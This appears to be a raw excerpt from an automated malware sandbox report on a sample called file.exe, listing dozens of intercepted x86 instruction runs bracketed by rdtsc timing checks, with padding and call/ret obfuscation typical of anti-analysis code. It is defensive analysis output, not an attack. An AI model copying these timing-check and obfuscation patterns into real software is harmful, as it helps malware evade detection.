Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783951 second address: 783957 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784979 second address: 78497F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783BD8 second address: 783BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783BDC second address: 783BF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783BF6 second address: 783BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784BA4 second address: 784BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 783BFB second address: 783C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784BA8 second address: 784BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 785B39 second address: 785BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB8B6DE64h 0x00000009 popad 0x0000000a push ebx 0x0000000b jng 00007FEFB8B6DE56h 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 mov dword ptr [ebp+12462430h], ebx 0x0000001c jmp 00007FEFB8B6DE5Ah 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov dword ptr [ebp+122D3293h], edx 0x0000002e mov edi, 2C836563h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FEFB8B6DE58h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ch 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov bh, cl 0x00000056 mov eax, dword ptr [ebp+122D0B45h] 0x0000005c mov bl, 28h 0x0000005e push FFFFFFFFh 0x00000060 mov edi, ecx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 jmp 00007FEFB8B6DE68h 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 784BB2 second address: 784BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7878BC second address: 78790C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007FEFB8B6DE58h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 push edi 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 pop edi 0x00000015 nop 0x00000016 mov bh, D4h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FEFB8B6DE58h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov dword ptr [ebp+1244FB49h], eax 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D27B9h], eax 0x00000042 xchg eax, esi 0x00000043 push edx 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 788847 second address: 7888AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FEFB9679B62h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FEFB9679B58h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a push 00000000h 0x0000002c call 00007FEFB9679B68h 0x00000031 jnl 00007FEFB9679B58h 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a add bh, 00000034h 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7888AF second address: 7888B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7888B3 second address: 7888B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7888B9 second address: 7888D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7888D8 second address: 7888DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787B18 second address: 787B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78A9ED second address: 78A9F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789BC6 second address: 789BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FEFB8B6DE56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789BE1 second address: 789C97 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FEFB9679B5Fh 0x0000000f push dword ptr fs:[00000000h] 0x00000016 jmp 00007FEFB9679B64h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov dword ptr [ebp+122D3319h], ebx 0x00000028 mov eax, dword ptr [ebp+122D14BDh] 0x0000002e movzx edi, cx 0x00000031 je 00007FEFB9679B56h 0x00000037 push FFFFFFFFh 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FEFB9679B58h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 call 00007FEFB9679B67h 0x00000058 stc 0x00000059 pop edi 0x0000005a nop 0x0000005b jmp 00007FEFB9679B5Eh 0x00000060 push eax 0x00000061 pushad 0x00000062 jmp 00007FEFB9679B62h 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 789C97 second address: 789C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B90B second address: 78B98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FEFB9679B58h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push esi 0x00000027 call 00007FEFB9679B58h 0x0000002c pop esi 0x0000002d mov dword ptr [esp+04h], esi 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc esi 0x0000003a push esi 0x0000003b ret 0x0000003c pop esi 0x0000003d ret 0x0000003e mov ebx, eax 0x00000040 add dword ptr [ebp+122D3231h], ecx 0x00000046 push 00000000h 0x00000048 mov dword ptr [ebp+122D3287h], edi 0x0000004e xchg eax, esi 0x0000004f jmp 00007FEFB9679B64h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FEFB9679B5Ah 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78B98B second address: 78B995 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEFB8B6DE5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78BBA9 second address: 78BBB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEFB9679B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792573 second address: 792579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 798379 second address: 79837F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797B85 second address: 797B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797D5A second address: 797D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 797D5E second address: 797D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C47A second address: 79C47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C47E second address: 79C493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jp 00007FEFB8B6DE64h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C493 second address: 79C497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C497 second address: 79C4D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007FEFB8B6DE67h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEFB8B6DE64h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C5D8 second address: 79C5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C5DD second address: 79C5F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C5F7 second address: 79C60A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C60A second address: 79C620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB8B6DE5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C620 second address: 79C624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C624 second address: 79C628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79C628 second address: 79C639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A250D second address: 7A2511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2511 second address: 7A252C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FEFB9679B56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A252C second address: 7A2530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732EAB second address: 732EC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732EC3 second address: 732EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732EC8 second address: 732ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732ECE second address: 732ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 732ED4 second address: 732ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1208 second address: 7A120C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A18CB second address: 7A18CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A18CF second address: 7A18DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEFB8B6DE56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A18DF second address: 7A18E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1B70 second address: 7A1B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEFB8B6DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1B7A second address: 7A1B92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FEFB9679B5Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FEFB9679B56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1B92 second address: 7A1B96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A1EAF second address: 7A1EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A2097 second address: 7A20AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEFB8B6DE62h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A20AE second address: 7A20CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A67DB second address: 7A67F3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEFB8B6DE5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007FEFB8B6DE56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A67F3 second address: 7A67F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6983 second address: 7A6993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FEFB8B6DE5Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6993 second address: 7A69A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FEFB9679B56h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A69A4 second address: 7A69AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6B31 second address: 7A6B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEFB9679B5Bh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6B46 second address: 7A6B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEFB8B6DE56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6CA2 second address: 7A6CAE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEFB9679B56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6F50 second address: 7A6F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6F56 second address: 7A6F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FEFB9679B5Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A71F0 second address: 7A7204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FEFB8B6DE62h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7204 second address: 7A722D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FEFB9679B56h 0x0000000a ja 00007FEFB9679B6Fh 0x00000010 jmp 00007FEFB9679B69h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A722D second address: 7A7247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEFB8B6DE64h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7247 second address: 7A724B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A7668 second address: 7A766C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A766C second address: 7A7670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A77BD second address: 7A77E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FEFB8B6DE67h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B386 second address: 75B3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007FEFB9679B5Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e jc 00007FEFB9679B56h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B3A7 second address: 75B3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B3AD second address: 75B3B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75B3B3 second address: 75B3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD4AA second address: 7AD4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEFB9679B68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD4C6 second address: 7AD4DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FEFB8B6DE58h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD4DA second address: 7AD4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jo 00007FEFB9679B58h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD4E9 second address: 7AD4EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AD4EE second address: 7AD4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC388 second address: 7AC38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7AC38E second address: 7AC392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 771E96 second address: 771E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77209A second address: 7720A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEFB9679B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7720A4 second address: 7720A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772481 second address: 772486 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772597 second address: 77259D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
